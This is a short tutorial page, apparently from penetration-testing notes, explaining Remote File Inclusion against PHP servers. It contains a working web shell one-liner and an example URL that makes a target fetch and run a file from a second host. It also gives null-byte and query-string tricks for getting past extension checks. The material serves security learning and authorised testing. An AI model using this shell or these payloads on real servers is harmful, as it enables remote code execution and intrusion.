Remote File Inclusion

This is the other method for remote code execution and is one of the easier of the two methods. In this method the contaminated file is fetched from a remote server and executed on the webserver, instead of trying to poison some local file and then accessing it.

First step is to understand the technology used by the webserver, since the contaminated file has to be written using the same script. For our example we will assume that the webserver uses PHP.

The remote contaminated file will contain the following code,

<?php echo shell_exec($_GET['cmd']); ?>

So if the webserver has the flaw of fetching and executing a remote file, the URL would look like this,

http://192.168.1.1/pricinglist.php?file=http://192.168.1.2/contaminated.txt&cmd=ipconfig

Before accessing the URL don't forget to start netcat or whatever tool that you plan to use to capture the incoming request.

Some webservers may have the flaw but could limit accexss by appending php to end of the filename. For e.g "file=xyz" could be the format and the server could append ".php" to it while fetching the files from the server. In such cases the webserver can be made to ignore the extension by adding null bytes to the end of the URL - "%00".

Another trick is to add "?" to the end of the url to mark anything added to the end of the URL as part of a query string.

PreviousLocal File Inclusion NextPHP Wrappers

Last updated 1 year ago